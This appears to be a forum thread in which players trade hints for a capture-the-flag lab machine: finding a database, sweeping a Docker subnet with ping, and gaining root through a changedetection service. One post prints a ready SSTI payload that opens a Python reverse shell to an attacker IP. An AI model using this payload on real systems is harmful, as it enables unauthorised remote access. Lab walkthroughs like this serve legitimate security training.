use cat on it, you are going to see loads of random stuff, but read carefully through it all looking for everything you can read. You will easily find what you’re looking for.
to get to the DB on the box - you need initial access. if you read all the comments above ours, people are trying to exploit the machine for intial access with some files, html, python and zip file. Actually even the admin, Hex, posted what you need for initial access - scroll up
https://nth.skerritt.blog/ nice tool to identify hashcat mode for hashes you find.
For the root part:
Use an easy SSTI payload.
{{ self.__init__.__globals__.__builtins__.__import__('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"IP\",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}
Make sure the Notification URL List is not empty and also point to your server.
Save.
Change the file to be monitored.
Finally got root.if you stuck somewhere, scroll up,you will find some tips.About shell from container, if no spawn, plz check ip in your ssti payload carefully.
1 Like
I am still stuck on root
I am doing a docker subnet scanning
idk if I am on the right track
also what is this datastore dir?
I can’t find it anywhere, or this is in the docker subnet I will hopefully discover?
to find the docker - you should ping the entire subnet
try something similar to this
subnet="111.222."
(
for a in {0..255}; do
for b in {1..254}; do
ip="$subnet.$a.$b"
(ping -c 1 -W 1 $ip >/dev/null 2>&1 && echo "Host $ip is up") &
done
done
wait
)
of course, change your subnet to whatever you have
I uploaded nmap binaries and used it
finally got the right one with its port and got the changedetection page!
1 Like
that was a long approach to get adam’s password
After I got this changedetection shell, I setup a local server to download the files in datastore, and to use it I forwarded the port to my local machine via james user
was there is a simpler way?
that took forever
can anyone provide me link of writeup ?